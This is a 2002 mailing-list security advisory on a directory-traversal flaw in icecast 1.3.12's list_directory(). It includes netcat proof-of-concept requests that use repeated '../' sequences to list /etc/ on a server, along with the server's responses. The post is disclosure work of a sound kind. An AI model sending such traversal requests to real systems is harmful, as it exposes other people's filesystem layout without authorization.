Vulnerability Development mailing list archives
VANED LABS: icecast filesystem disclosure
From: glaive () VANED NET
Date: Tue, 9 Jul 2002 13:39:03 -0500
list_directory() makes no effort to constrain the request to the static directory. Icecast allows for remote probing of the underlying filesystem structure. (on a side note, this can also be used to list files with a .mp3 extension anywhere on the system. send_file() does do traversal checking.) % nc icecast.host 8000 GET /file/../../../../../../../../nonexistent/ HTTP/1.0 HTTP/1.0 404 Not Found Server: icecast/1.3.12 Connection: close Content-Type: text/html ... % nc icecast.host 8000 GET /file/../../../../../../../../etc/ HTTP/1.0 HTTP/1.0 200 OK Server: icecast/1.3.12 Connection: close Content-Type: text/html ...
Current thread:
- VANED LABS: icecast filesystem disclosure glaive (Jul 09)
- <Possible follow-ups>
- Re: VANED LABS: icecast filesystem disclosure matt (Jul 16)